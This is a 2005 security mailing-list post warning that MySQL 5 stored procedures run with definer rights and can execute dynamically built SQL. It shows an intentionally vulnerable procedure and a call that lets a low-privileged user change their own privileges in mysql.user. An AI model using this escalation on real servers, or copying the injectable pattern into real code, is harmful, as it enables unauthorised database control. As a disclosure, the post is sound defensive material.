[dbsec] MySQL 5 Stored Procedures / SQL Injection
- From: Chris Anley <chris@xxxxxxxxxxxxxxx>
- To: dbsec@xxxxxxxxxxxxx
- Date: Wed, 16 Nov 2005 17:01:15 +0000
(also posted on website)
MySQL 5 is now out, which is great; loads of new features to fiddle
with. One interesting new feature is the stored procedure mechanism,
mainly because it has the same sql injection behaviour as Oracle -
procedures execute with 'definer' rights by default, and can contain
dynamically constructed statements. This can lead to dangerous security
flaws. To take an absurdly contrived example, this procedure:
create procedure test.injection( s text )
begin
set @q = concat(" ", s);
PREPARE stmt from @q;
EXECUTE stmt;
end;
...if created by 'root', will run with 'root' privileges. This means
that anyone who can execute it (say, 'low_priv', our low privileged
account) can run arbitrary sql with root privileges, like this:
mysql> call test.injection('update mysql.user set file_priv=''Y'' where
user=''low_priv''');
So the low_priv user can grant themselves root privileges. Obviously
MySQL doesn't have any default procedures (yet), but this is something
to watch for.
Other related posts:
- » [dbsec] MySQL 5 Stored Procedures / SQL Injection